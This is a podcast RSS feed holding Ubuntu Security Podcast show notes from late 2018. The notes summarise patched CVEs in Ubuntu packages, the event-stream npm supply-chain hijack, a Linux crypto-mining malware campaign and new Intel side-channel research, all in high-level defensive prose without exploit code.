<h3 id="usn-3795-3-libssh-regression">[<a href="https://usn.ubuntu.com/3795-3/">USN-3795-3</a>] libssh regression</h3>
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10933">CVE-2018-10933</a> - covered in Episode 8</li>
<li>Upstream fix introduced a regression which broke server-side keyboard authentication</li>
<li>Server-side, not client-side
<ul>
<li>Not a common scenario used so unlikely to affect many users as need to use
multiple interactive keyboard-based prompts to trigger (say password and
token)</li>
<li>Server would be stuck</li>
</ul>
</li>
<li>Backport upstream fix</li>
</ul>
<h3 id="usn-3832-1-usn-3833-1-linux-kernel--aws--vulnerabilities">[<a href="https://usn.ubuntu.com/3832-1/">USN-3832-1</a>, USN-3833-1] Linux kernel (AWS) vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Cosmic, first 2 in Bionic as well
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6559">CVE-2018-6559</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18955">CVE-2018-18955</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18653">CVE-2018-18653</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18445">CVE-2018-18445</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18281">CVE-2018-18281</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17972">CVE-2018-17972</a></li>
</ul>
</li>
<li>Philipp Wendler discovered Ubuntu specific flaw in the way user namespaces interact with overlayfs</li>
<li>Allows regular users to list contents of directories which they do not have read-access to (ie could list /root)</li>
<li>Create a user and a mount namespace and then mount an overlay via overlayfs within it
<ul>
<li>Within the overlayed mount, if say contained &ldquo;root&rdquo; and was mounted at the
filesystem root (/), overlayfs would get confused about which permissions
to use when running and would not use the real underlying permissions but
would instead use the user supplied ones from the overlayed fs</li>
</ul>
</li>
<li>Relates to the fix for a previous CVE (<a href="https://ubuntu.com/security/2015/CVE-2015-1328.html">CVE-2015-1328</a>)
<ul>
<li>This fix got dropped during Bionic development cycle so reintroduced this similar vulnerability</li>
<li>New test added to Ubuntu kernel test suite to ensure this does not regress again in the future</li>
</ul>
</li>
</ul>
<h2 id="open-source-software-supply-chain-integrity">Open Source Software Supply Chain Integrity</h2>
<ul>
<li>NPM package (event-stream) got hijacked to inject code to target users of copay (Bitcoin wallet)</li>
<li>Author of event-stream had lost interest, was emailed by a small contributor to take over maintenance and gave them ownership of the repo
<ul>
<li>Pushed a small change to add a new dependency to the package</li>
<li>This then contained code to try and bundle itself with target application - copay-dash</li>
<li>Targetted software supply chain at 2 points - event-stream repo / package AND getting into the build-system for copay-dash as a result
<ul>
<li>So would bundle bitcoin wallet stealing code into copay-dash</li>
</ul>
</li>
</ul>
</li>
<li>2 software supply chain attacks
<ul>
<li>Hard to fix first one since maintainers can lost interest and hand over to anyone
<ul>
<li>New owner may not have trust the old one did</li>
<li>npm doesn&rsquo;t care - is uncurated</li>
</ul>
</li>
<li>Copay bundled and distributed dependencies so perhaps should have some responsibility to check those etc</li>
</ul>
</li>
<li>Ubuntu is based on Debian and both are curated repos
<ul>
<li>Packages are maintained by trusted developers</li>
<li>Much harder to mount a similar attach on Ubuntu / Debian archives due to
barrier to entry as a trusted developer</li>
<li>Smaller dependency chains as well compared to npm so harder to hide such an attack as well</li>
</ul>
</li>
<li>Snap store is a different story though</li>
<li>Bottom line - have to trust your software suppliers
<ul>
<li>Ubuntu - Canonical / trusted maintainers</li>
<li>Snap store - individual publishers</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E014.mp3" length="21013028" type="audio/mpeg" /><itunes:duration>21:53</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 13
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-13/</link>
          <pubDate>Mon, 26 Nov 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E013.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 13</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 16 unique CVEs addressed across the supported Ubuntu releases and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 16 unique CVEs addressed across the supported Ubuntu releases and more.</itunes:summary>
        <description>This week we look at some details of the 16 unique CVEs addressed across the supported Ubuntu releases and more.</description>
        <googleplay:description>This week we look at some details of the 16 unique CVEs addressed across the supported Ubuntu releases and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 16 unique CVEs addressed across the supported Ubuntu releases and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>16 unique CVEs addressed</p>
<h3 id="usn-3816-2-systemd-vulnerability">[<a href="https://usn.ubuntu.com/3816-2/">USN-3816-2</a>] systemd vulnerability</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15687">CVE-2018-15687</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15686">CVE-2018-15686</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-6954">CVE-2018-6954</a></li>
</ul>
</li>
<li>Episode 12 - original fix for CVE-2018-6954 was incomplete - this includes the complete fix</li>
<li>Also includes an update to avoid a possible hang on shutdown in unattended-upgrades - <a href="https://bugs.launchpad.net/bugs/1803391">LP #1803391</a>
<ul>
<li>During shutdown, systemd is already in the process of shutting down</li>
<li>Then unattended-upgrades runs and it goes and tries to update systemd - which then tries to reexec it - which blocks waiting for it to finish shutting down</li>
<li>Creates a deadlock since systemd is waiting on unattended-upgrades to finish but u-u is waiting on systemd reexec</li>
<li>Fix is to not do reexec if systemd is already in the process of stopping</li>
</ul>
</li>
</ul>
<h3 id="usn-3825-1-usn-3825-2-mod-perl-vulnerability">[<a href="https://usn.ubuntu.com/3825-1/">USN-3825-1</a>, USN-3825-2] mod_perl vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2011-2767">CVE-2011-2767</a></li>
</ul>
</li>
<li>Old CVE - reported to Debian in 2011, who assigned a CVE internally but didn&rsquo;t go any further with it</li>
<li>Recently the original reporter of the vulnerability submitted a patch to Debian to fix it - so vuln was reported to Mitre</li>
<li>Now fixed in Ubuntu as well</li>
</ul>
<h3 id="usn-3801-2-firefox-regressions">[<a href="https://usn.ubuntu.com/3801-2/">USN-3801-2</a>] Firefox regressions</h3>
<ul>
<li>12 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-12397">CVE-2018-12397</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12396">CVE-2018-12396</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12395">CVE-2018-12395</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12403">CVE-2018-12403</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12402">CVE-2018-12402</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12401">CVE-2018-12401</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12399">CVE-2018-12399</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12398">CVE-2018-12398</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12393">CVE-2018-12393</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12392">CVE-2018-12392</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12390">CVE-2018-12390</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12388">CVE-2018-12388</a></li>
</ul>
</li>
<li>Firefox update (v63) (Episode 9) had some minor regressions
<ul>
<li>These were present in the upstream firefox release itself</li>
</ul>
</li>
<li>This provides <a href="https://www.mozilla.org/en-US/firefox/63.0.3/releasenotes/">63.0.3</a> which contains these fixes from upstream to address the regressions
<ul>
<li>WebGL hangs, slow page loading if using specific proxy settings etc.</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="linux-cryptocoin-malware">Linux Cryptocoin Malware</h3>
<ul>
<li><a href="https://www.zdnet.com/article/new-linux-crypto-miner-steals-your-root-password-and-disables-your-antivirus/">https://www.zdnet.com/article/new-linux-crypto-miner-steals-your-root-password-and-disables-your-antivirus/</a></li>
<li>Apparently reports of users affected</li>
<li>Requires SSH to login - bruteforce passwords
<ul>
<li>Use strong passwords / public key auth</li>
</ul>
</li>
<li>Elevates privileges via two very old CVEs
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-5195">CVE-2016-5195</a> - Dirty Cow - fixed for Ubuntu in October 2016</li>
<li><a href="https://ubuntu.com/security/CVE-2013-2094">CVE-2013-2094</a> - perf root privilege escalation - fixed for Ubuntu in May 2013</li>
</ul>
</li>
<li>All Ubuntu users are fine unless you are running a old release AND have not been applying security patches</li>
<li>Please use strong passwords if enabling openssh server</li>
</ul>
<h3 id="preview-of-next-episode">Preview of next episode</h3>
<h4 id="upcoming-fixes">Upcoming fixes</h4>
<ul>
<li>qemu, webkitgtk</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E013.mp3" length="8162872" type="audio/mpeg" /><itunes:duration>08:30</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 12
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-12/</link>
          <pubDate>Mon, 19 Nov 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E012.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 12</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 33 unique CVEs addressed across the supported Ubuntu releases, including some significant updates for systemd and the kernel, plus we talk about even more Intel side-channel vulnerabilities and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 33 unique CVEs addressed across the supported Ubuntu releases, including some significant updates for systemd and the kernel, plus we talk about even more Intel side-channel vulnerabilities and more.</itunes:summary>
        <description>This week we look at some details of the 33 unique CVEs addressed across the supported Ubuntu releases, including some significant updates for systemd and the kernel, plus we talk about even more Intel side-channel vulnerabilities and more.</description>
        <googleplay:description>This week we look at some details of the 33 unique CVEs addressed across the supported Ubuntu releases, including some significant updates for systemd and the kernel, plus we talk about even more Intel side-channel vulnerabilities and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 33 unique CVEs addressed across the
supported Ubuntu releases, including some significant updates for systemd and
the kernel, plus we talk about even more Intel side-channel vulnerabilities and
more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>33 unique CVEs addressed</p>
<h3 id="usn-3814-1-libmspack-vulnerabilities">[<a href="https://usn.ubuntu.com/3814-1/">USN-3814-1</a>] libmspack vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18585">CVE-2018-18585</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18584">CVE-2018-18584</a></li>
</ul>
</li>
<li>Out of bounds write of 1 byte when a CAB file uses the maximum Quantum block size - buffer overflow, DoS -&gt; crash, possible code execution</li>
<li>Failure to validate filenames properly - could accept a filename with embedded NUL bytes - possible DoS -&gt; crash</li>
</ul>
<h3 id="usn-3815-1-usn-3815-2-gettext-vulnerability">[<a href="https://usn.ubuntu.com/3815-1/">USN-3815-1</a>, <a href="https://usn.ubuntu.com/3815-2/">USN-3815-2</a>] gettext vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18751">CVE-2018-18751</a></li>
</ul>
</li>
<li>Double free for specially crafted translations file, DoS -&gt; crash, possible code execution via heap corruption etc.
<ul>
<li>PoC&rsquo;s on github</li>
</ul>
</li>
</ul>
<h3 id="usn-3816-1-systemd-vulnerabilities">[<a href="https://usn.ubuntu.com/3816-1/">USN-3816-1</a>] systemd vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6954">CVE-2018-6954</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15687">CVE-2018-15687</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15686">CVE-2018-15686</a></li>
</ul>
</li>
<li>Large backport of multiple patch series</li>
<li>Jann Horn (GPZ) reported two issues to Ubuntu regarding systemd
<ul>
<li>possible to inject / alter state across re-execution of systemd itself (since serialized state) - but fails to deserialize it correctly
<ul>
<li>Insecure use of fgets() when parsing long lines</li>
<li>Possible root privilege escalation</li>
</ul>
</li>
<li>When changing ownership of files in a directory via systemd (useful for executing a systemd unit as a given user for example to ensure files it needs are owned by that user)
<ul>
<li>Would try and handle symlinks specially BUT this is racy (since could change where pointed to during check of symlink and then actual work of chown() after)</li>
<li>So for instance, could convince systemd to possible change the ownership of a root owned file to that of another user</li>
<li>So could allow to change arbitrary files ownerships or even permissions</li>
</ul>
</li>
</ul>
</li>
<li>Third issue - older one, systemd-tmpfiles could be used to obtain ownership of arbitrary files
<ul>
<li>Would follow symlinks in non-terminal path components, and then operate on the resulting file</li>
<li>Can tell it to set permissions / ownership of given files</li>
<li>So could race it to replace path components with symlinks to root-owned files and get it to change their ownership to that of the user (or whomeever)</li>
<li>Original patch series (March) didn&rsquo;t completely fix this - required much more invasive patching later</li>
<li>We waited to fix it until the complete fix was available and accepted upstream (August) to then start backporting</li>
</ul>
</li>
</ul>
<h3 id="usn-3814-2-usn-3814-3-clamav-vulnerabilities">[<a href="https://usn.ubuntu.com/3814-2/">USN-3814-2</a>, USN-3814-3] ClamAV vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM &amp; Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18585">CVE-2018-18585</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18584">CVE-2018-18584</a></li>
</ul>
</li>
<li>Same issues as for libmspack earlier (since clamav in Trusty and Precise ESM embeds libmspack, later releases use the system libmspack package instead)</li>
</ul>
<h3 id="usn-3811-2-spamassassin-vulnerability">[<a href="https://usn.ubuntu.com/3811-2/">USN-3811-2</a>] SpamAssassin vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-15705">CVE-2017-15705</a></li>
</ul>
</li>
<li>One of the CVEs for SpamAssassin in Episode 7</li>
</ul>
<h3 id="usn-3817-1-usn-3817-2-python-vulnerabilities">[<a href="https://usn.ubuntu.com/3817-1/">USN-3817-1</a>, USN-3817-2] Python vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14647">CVE-2018-14647</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1061">CVE-2018-1061</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1060">CVE-2018-1060</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000802">CVE-2018-1000802</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000030">CVE-2018-1000030</a></li>
</ul>
</li>
<li>Failure to initialize hash salt for PRNG in hash tables for elementtree (XML parser)
<ul>
<li>Could relatively easily cause hash-collisions on specially crafted document</li>
<li>High CPU and memory usage -&gt; DoS</li>
</ul>
</li>
<li>Possible command injection when using Python to create a ZIP file archive
<ul>
<li>Used spawn() which is vulnerable to shell command injection -&gt; subprocess()</li>
</ul>
</li>
<li>3 lower priority issues
<ul>
<li>Race condition in when reading from multiple threads on same file - possible heap buffer overflow or UAF</li>
<li>DoS via CPU usage due to regexes in mail server response handling with backtracking - could be triggered by a malicious mail server</li>
<li>Similar but in regexes in difflib (catastrophic backtracking)</li>
</ul>
</li>
</ul>
<h3 id="usn-3818-1-postgresql-vulnerability">[<a href="https://usn.ubuntu.com/3818-1/">USN-3818-1</a>] PostgreSQL vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16850">CVE-2018-16850</a></li>
</ul>
</li>
<li>Possible to inject arbitrary SQL with superuser privileges during dump/restore cycle</li>
<li>Can be triggered by regular users in default config since they can trigger as have CREATE privilege on the public schema</li>
</ul>
<h3 id="usn-3819-1-linux-kernel-vulnerability">[<a href="https://usn.ubuntu.com/3819-1/">USN-3819-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15471">CVE-2018-15471</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3820-1-usn-3820-2-usn-3820-3-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3820-1/">USN-3820-1</a>, USN-3820-2, USN-3820-3] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic, Xenial (Bionic HWE kernel) and Trusty (Azure)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-9363">CVE-2018-9363</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16658">CVE-2018-16658</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13168">CVE-2017-13168</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15471">CVE-2018-15471</a></li>
</ul>
</li>
<li>Bluetooth HID integer overflow and info leak in CDROM ioctl (covered in Episode 9 for Xenial kernel)</li>
<li>Possible privilege escalation via SCSI subsystem</li>
<li>Xen virtual network driver didn&rsquo;t check supplied parameters -&gt; integer overflow -&gt; OOB read -&gt; possible OOB write -&gt; privilege escalation, DoS etc</li>
</ul>
<h3 id="usn-3821-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3821-1/">USN-3821-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Xenial and Trusty (Xenial HWE kernel)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18021">CVE-2018-18021</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17972">CVE-2018-17972</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14617">CVE-2018-14617</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14609">CVE-2018-14609</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13096">CVE-2018-13096</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13053">CVE-2018-13053</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10880">CVE-2018-10880</a></li>
</ul>
</li>
<li>Potential host system crash / code execution from malicious guest for KVM on ARM64</li>
<li>Stack unwinding in procfs didn&rsquo;t check caller was root - anyone could race stack unwinder to read stack of arbitrary kernel processes</li>
<li>NULL pointer dereferences in various file-system drivers -&gt; triggered by mounting malicious fs image
<ul>
<li>HFS+, btrfs, f2fs</li>
</ul>
</li>
<li>OOB stack write in ext4 with malicious image</li>
<li>Integer overflow in alarmtimer handling</li>
</ul>
<h3 id="usn-3822-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3822-1/">USN-3822-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty and Precise ESM (Trusty HWE kernel)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-9363">CVE-2018-9363</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16658">CVE-2018-16658</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16649">CVE-2017-16649</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13168">CVE-2017-13168</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9588">CVE-2016-9588</a></li>
</ul>
</li>
<li>Same bluetooth HID, CDROM and SCSI vulns as for Bionic earlier</li>
<li>Possible divide by zero in CDC USB ethernet driver for specially crafted device</li>
<li>KVM guest user could cause guest OS crash due to mismanagement of emulated exception handling</li>
</ul>
<h3 id="usn-3823-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3823-1/">USN-3823-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-3620">CVE-2018-3620</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3646">CVE-2018-3646</a></li>
</ul>
</li>
<li><a href="http://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/L1TF">L1TF</a> fixes for Precise ESM (see Episode 1 for more details)</li>
</ul>
<h3 id="lsn-0045-1-linux-kernel-vulnerability">[LSN-0045-1] Linux kernel vulnerability</h3>
<ul>
<li>Live patch covering Bionic, Xenial and Trusty
<ul>
<li>CVE-2017-13168</li>
<li><a href="https://ubuntu.com/security/CVE-2018-10880">CVE-2018-10880</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9363">CVE-2018-9363</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16658">CVE-2018-16658</a></li>
</ul>
</li>
<li>Same bluetooth HID, CDROM, SCSI and ext4 vulnerabilities mentioned earlier</li>
</ul>
<h3 id="usn-3824-1-openjdk-7-vulnerabilities">[<a href="https://usn.ubuntu.com/3824-1/">USN-3824-1</a>] OpenJDK 7 vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-3180">CVE-2018-3180</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3169">CVE-2018-3169</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3149">CVE-2018-3149</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3139">CVE-2018-3139</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3136">CVE-2018-3136</a></li>
</ul>
</li>
<li>All covered in the previous openjdk-8 update in Episode 10 (that included
more as this is just those fixes which also apply to openjdk-7)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="new-intel-side-channel-attacks--again-dot-dot-dot">New Intel Side Channel Attacks (again&hellip;)</h3>
<ul>
<li><a href="https://arxiv.org/pdf/1811.05441.pdf">A Systematic Evaluation of Transient Execution Attacks and Defenses</a></li>
<li>Reclassifies existing Meltdown and Spectre attacks with a new nomenclature
<ul>
<li>ie. original Meltdown is now Meltdown-US (US = User/Supervisor)</li>
</ul>
</li>
<li>Identifies a bunch of other possible variants for both Meltdown and Spectre
<ul>
<li>Meltdown-PK - bypass restrictions on Intel memory protection keys</li>
<li>Meltdown-BR - Spectre-like attack but using bounds-range exceeded exception to trigger</li>
<li>5 new Spectre variants based on existing ones but targetting different
microarchitectural elements (ie targetting the Branch Target Buffer when
doing a Spectre-RSB attack since some processors fallback to BTB when RSB
is empty)</li>
</ul>
</li>
<li>Compares existing mitigations for each existing and newly identified attack</li>
<li>Very comprehensive, demonstrates the utility of such a complete analysis compared to existing approach where different researchers have looked at a single aspect</li>
<li>Still an active area of research with new vulnerabilities turning up</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E012.mp3" length="19337429" type="audio/mpeg" /><itunes:duration>20:08</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 11
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-11/</link>
          <pubDate>Mon, 12 Nov 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E011.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 11</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 23 unique CVEs addressed across the supported Ubuntu releases, discuss the latest purported Intel side-channel vulnerability PortSmash and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 23 unique CVEs addressed across the supported Ubuntu releases, discuss the latest purported Intel side-channel vulnerability PortSmash and more.</itunes:summary>
        <description>This week we look at some details of the 23 unique CVEs addressed across the supported Ubuntu releases, discuss the latest purported Intel side-channel vulnerability PortSmash and more.</description>
        <googleplay:description>This week we look at some details of the 23 unique CVEs addressed across the supported Ubuntu releases, discuss the latest purported Intel side-channel vulnerability PortSmash and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 23 unique CVEs addressed across the supported Ubuntu releases, discuss the latest purported Intel side-channel vulnerability PortSmash and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>23 unique CVEs addressed</p>
<h3 id="usn-3806-1-systemd-vulnerability">[<a href="https://usn.ubuntu.com/3806-1/">USN-3806-1</a>] systemd vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15688">CVE-2018-15688</a></li>
</ul>
</li>
<li>Reported by Felix Wilhelm from Google Security Team to Ubuntu in <a href="https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1795921">LP #1795921</a></li>
<li>systemd contains DHCPv6 client written from scratch</li>
<li>Heap buffer overflow in DHCPv6 option handling (say via server id of &gt;=493 bytes)</li>
<li>Coordinated with systemd upstream and Red Hat to resolve this</li>
</ul>
<h3 id="usn-3807-1-networkmanager-vulnerability">[<a href="https://usn.ubuntu.com/3807-1/">USN-3807-1</a>] NetworkManager vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15688">CVE-2018-15688</a></li>
</ul>
</li>
<li>NetworkManager contains the same code taken from systemd-networkd so is also vulnerable</li>
</ul>
<h3 id="usn-3808-1-ruby-vulnerabilities">[<a href="https://usn.ubuntu.com/3808-1/">USN-3808-1</a>] Ruby vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic and Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16395">CVE-2018-16395</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16396">CVE-2018-16396</a></li>
</ul>
</li>
<li>Misuses return value when comparing names in X509 certificates
<ul>
<li>If returned 1 on comparing name would assume are identical but are in fact not</li>
<li>Could allow to impersonate a certificate</li>
</ul>
</li>
<li>Taint flags not propagated when unpacking arrays into strings, or packing strings into arrays
<ul>
<li>Could allow untrusted data to be treated as trusted</li>
</ul>
</li>
</ul>
<h3 id="usn-3809-1-openssh-vulnerabilities">[<a href="https://usn.ubuntu.com/3809-1/">USN-3809-1</a>] OpenSSH vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15473">CVE-2018-15473</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10708">CVE-2016-10708</a></li>
</ul>
</li>
<li>User enumeration due to fail to bail out early on invalid user authentication
<ul>
<li>Would take longer to process a packet with a valid username than an invalid one</li>
<li>Can determine account names as a result via brute-force timing attack</li>
</ul>
</li>
<li>Possible to crash the per-connection process on NULL pointer dereference
<ul>
<li>Low priority since doesn&rsquo;t crash the main daemon so not really a DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-3786-2-libxkbcommon-vulnerabilities">[<a href="https://usn.ubuntu.com/3786-2/">USN-3786-2</a>] libxkbcommon vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15856">CVE-2018-15856</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15864">CVE-2018-15864</a></li>
